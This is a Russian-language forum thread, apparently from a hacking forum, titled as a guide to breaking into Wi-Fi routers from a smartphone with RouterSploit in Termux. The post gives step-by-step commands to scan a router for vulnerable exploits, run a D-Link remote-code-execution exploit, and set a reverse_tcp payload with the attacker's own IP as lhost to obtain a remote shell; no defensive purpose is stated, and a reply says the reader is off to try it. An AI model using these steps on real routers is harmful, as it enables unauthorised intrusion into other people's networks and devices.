Взлом wi-fi роутера со смартфона routersploit

Tartuga

Бывалый
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
PREMIUM USER

Tartuga

Бывалый
ПРОВЕРЕННЫЙ ПРОДАВЕЦ
PREMIUM USER
Регистрация
7 Фев 2020
Сообщения
525
Реакции
98
Репутация
147
Все действия мы будем производить с помощью Termux.

И так начнем
Прежде чем устанавливать и запускать RouterSploit нужно прописать следующие команды:
Описывать значение этих команд я не буду, так как большинству читателей это неинтересно. К тому же самообучение никто не отменял.
Далее прописываем:
git clone

Пожалуйста Авторизуйтесь или Зарегистрируйтесь для просмотра скрытого текста.


Переходим в папку RoutersploitTermux командой:

Запускаем процесс установки:
По окончании, появится такое сообщение:

Хочу предупредить, что процесс установки занимает довольно продолжительное время, примерно 20-30 минут. Если возникнут какие-либо ошибки, то скорее всего, Вам ничто не поможет. Можете конечно попытаться найти способ, чтобы устранить их, но лично я, перепробовав несколько способов и не найдя рабочего, смирился и бросил. Так и не установив программу на свой первый смартфон (он у меня как подопытный, сначала все тестирую на нем), я попробовал установить её на другой, и о чудо - всё прошло нормально. Получается, все зависит от случая и Вашего телефона. Хотя я подозреваю, что ошибки, которые возникли на первом телефоне, связаны с тем, что он довольно старый.
Давайте же запустим наш RouterSploit и протестируем его:
cd routersploit​
python rsf.py​
После запуска появится следующее:


Данная программа содержит множество эксплойтов для разных моделей роутеров: D-Link, TP-Link, Huawei, Cisco и т.д. Список всех содержащихся эксплойтов можно посмотреть, прописав команду:
Чтобы проверить, можно ли с помощью какого-либо из имеющихся эксплойтов взломать роутер, пишем:
set target <ip роутера>, например set target 192.168.1.1​
exploit​
Далее появится список, где будет показано, подвержен ли роутер
какой-либо уязвимости. Как видно на фото, ни одним из эксплойтов мой роутер взломать нельзя.


Если же роутер содержит ту или иную уязвимость, Вы увидите следующее:

Показано какие эксплойты можно применить
Чтобы применить эксплойт прописываем:
use exploits/router/dlink/dsl_2750b_rce
set target <ip роутера>​
check​
run
set payload reverse_tcp​
set lhost <Ваш IP>​
run​

После этого появится сообщение, перевожу дословно: "Наслаждайся своей раковиной". Взлом прошел успешно.
 

ProZhko

Участник

ProZhko

Участник
Регистрация
16 Апр 2020
Сообщения
5
Реакции
0
Репутация
0
иду пробывать
 
Сверху